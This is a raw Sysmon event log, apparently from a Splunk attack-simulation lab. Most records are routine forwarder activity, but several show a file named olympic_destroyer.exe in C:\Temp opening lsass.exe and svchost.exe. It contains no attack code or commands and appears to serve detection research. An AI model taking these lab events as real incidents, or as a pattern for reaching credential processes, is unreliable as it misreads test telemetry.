10341000x8000000000000000297425Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.129{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297424Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.129{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297423Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.114{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297422Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.110{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000221291Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:09.892{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=323DB9FB48EE3D1859735F243CB74E57,SHA256=2D87C0BE9BAAC18D1CB0822F6780B8C82C25AEB151CBBAA361A234DD55F96B05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297458Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:09.575{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=632079E14B0119FF6574A8357AA9A0D2,SHA256=1FC6F8D8701A1E87D486711294A2A35C2F93529DADB1B3EF0622DD2F3C5C33BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297457Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:09.013{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=21E7F13E59361D1BC5847D6696C3FB21,SHA256=DFD1951DBC7378C478C42BBA4D96AE489F44209C4E4F3E5CF53C26F1FAF909FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297456Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:09.012{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=1E489CD284888309DABCFF6EC54628A3,SHA256=FD031BE2782370034F8FC0A38F34B6862CBEC97E105E8CEF9DB302E1A2B76152,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221292Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:10.908{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=122D20BA0DBDB10C02D33D47C153A176,SHA256=26AB326DF0BABDEA920209885B9823B05CB592BA09EFA6B9F4AFCF5E7E89365E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297459Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:10.591{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A54C9CAF9B69B1EC09BD2E4947531CC,SHA256=B01A2E9C056A89B01B4DEA341A948871B90E9CDE7446B1536191FA9F288DB359,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221293Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:11.955{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8697079D3B425001844993EC60AB27D,SHA256=02516250831B9906272D0E6EBFC0EEE98697A7B8EE766CD2566CAEF0447FEB72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297460Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:11.612{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A415DFF3DC72EF7E567151191A7F856,SHA256=689DB6C78AA806EBF4212588628D5B62A04432AE13E1A7D053E40CC9545EB91F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297462Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:12.632{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FC755B361BBD4ABB9C4E9F674B9B556,SHA256=DB6F42CD93D1133A9E2F1750D16349A3B98A72F5D4838D7F8872E0D093CB6662,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221294Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:10.687{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51640-false10.0.1.12-8000- 354300x8000000000000000297461Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:09.564{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49449-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297463Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:13.636{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F250A0CB0C0D67E614BC32C1EAEB652,SHA256=4748494FAD19E166F801F8E8A4B9CCC6DB3B7D2C5DC2E2E9FAB016974C25FEC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221295Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:13.080{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=274E97546B0DC0BF764DFE367B6A614C,SHA256=8BE377F211C181503FAF996359B0521F524329619DD9BAD27B839DDC1A617EA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297464Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:14.667{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D1B34C9C93A069481BD9974C57449C4,SHA256=63DF9C0887FDB2564ADB9A2535C8C79E5E98437B70A0ACACF64353876D2049B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221296Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:14.127{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6962A65B78C03AF23B0949E413C46F5,SHA256=51B6EACF5B7EEF7A88DCD6393273B840B59B9AD4FC03DC6DF348D638665DB6F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297465Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:15.683{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=725922A9961CDFBC4CC405A6E0DE92AF,SHA256=73E265829AC8E6809316A545BF0608281C6429F09BAFCB8C0015D0B7763F67E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221297Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:15.205{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E85EB5D2E152AC1DB378F80DC086B4DD,SHA256=85257CA672E42BEDA8C03D6E9F079FBCC0A153E4F798EB491FB08873B6B8C3FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297466Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:16.683{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FECCE3A34BC504964434FE32C6488C16,SHA256=02073B71E8AC6A01B11D2D67678A970E35083BFD91F71B9474635F59E633DEF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221298Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:16.220{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7C6EC30C44051E9F95100B31C3B9512,SHA256=8DC96A5004B7F72F669DB70D3BC822BF821DEA4463A39012976B335673AA856B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297468Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:17.686{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA3330C5BB498830F06A43224D94A57A,SHA256=2505A5D9FD23D261367BEF627817941BFE65DED47F82A82E21B85506FAAED6E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221299Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:17.236{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82021B67CFF5033B9A0CC502D3068BCE,SHA256=AB94F22B1C300B264A3145DA41D1FF9614A842B64355662B73941691BD97F52B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297467Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:14.670{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49450-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297469Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:18.712{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=131E94A9C86D5F11CE3F7331FE2DEBBC,SHA256=1EE89F6BEB517E7FD81E6F2AFEC903B1A9B5A3C649A8FB9F890B9C02AF6D1FA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221300Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:18.283{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C297707E7F6E235A9C39BAA42B6B457D,SHA256=4D1612838519273D56ED7F0185091A8AC9050DB34FA4F4BB0F4119D2734AB5DC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297487Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:19.887{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1783-6216-2D07-000000003802}6420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297486Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:19.887{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297485Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:19.887{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297484Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:19.887{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1783-6216-2D07-000000003802}6420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297483Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:19.887{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297482Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:19.887{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297481Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:19.887{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1783-6216-2D07-000000003802}6420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297480Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:19.889{C8EA50B7-1783-6216-2D07-000000003802}6420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297479Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:19.724{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92145284AC6E449B548A55699891CF32,SHA256=0B159F5DAA303955B6BB14A2987D76064C773B2E36D92EEF28A8D23DE086556C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221302Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:16.468{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51641-false10.0.1.12-8000- 23542300x8000000000000000221301Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:19.331{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD6EB0D2E3DEF9B2CA9A84F36F6F3052,SHA256=EEFC34BAC9D98CB7AF0211F7F9E8057C4D896E5CFA38A0237BA71BC88462878C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297478Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:19.524{C8EA50B7-1783-6216-2C07-000000003802}53162956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program 